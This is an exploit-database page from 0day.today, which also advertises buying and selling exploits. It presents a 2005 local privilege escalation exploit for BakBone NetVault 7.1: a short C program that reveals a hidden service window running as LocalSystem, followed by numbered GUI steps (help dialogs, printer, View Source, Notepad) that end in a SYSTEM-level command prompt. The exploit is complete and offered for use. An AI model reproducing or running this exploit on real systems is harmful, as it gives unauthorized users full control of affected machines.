0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

BakBone NetVault 7.1 Local Privilege Escalation Exploit

Author

Reed Arvin

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-7447

Category

local exploits

Date add

26-04-2005

Platform

unsorted

=======================================================
BakBone NetVault 7.1 Local Privilege Escalation Exploit
=======================================================


// ===== Start UnhideNetVaultServiceWindow.c ======
#include <stdio.h>
#include <windows.h>

int main( void )
{
	HWND hWnd;
	char szWindowName[] = "C:\\Program Files\\BakBone Software\\NetVault\\bin\\nvstatsmngr.exe";

	printf( "Finding window %s\n", szWindowName );

	hWnd = FindWindow( NULL, szWindowName );

	if ( hWnd == NULL )
	{
		printf( "ERROR! Could not find window %s\n", szWindowName );
	
		exit( 1 );
	}

	ShowWindow( hWnd, SW_SHOW );

	return 0;
}
// ===== End UnhideNetVaultServiceWindow.c ======

/*
1. The C:\Program Files\BakBone Software\NetVault\bin\nvstatsmngr.exe window will
   appear. Access the window menu in the upper left and click Properties.

2. Right click on the word Window under the Display Options and click What's This?

3. Right click on the help text that is shown in yellow and click Print Topic.

4. Right click on any printer and click Open.

5. Click Help, Help Topics.

6. Right click in the right side of the help screen and click View Source.

7. Notepad will appear (running under the context of the LocalSystem account).
   Click File, click Open.

8. Change Files of type: to All Files, navigate to the system32 directory and
   locate cmd.exe.  Right click cmd.exe and choose Open.

The result is a command prompt running under the context of the LocalSystem
account.

*/



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

BakBone NetVault 7.1 Local Privilege Escalation Exploit

Report Error

Report Error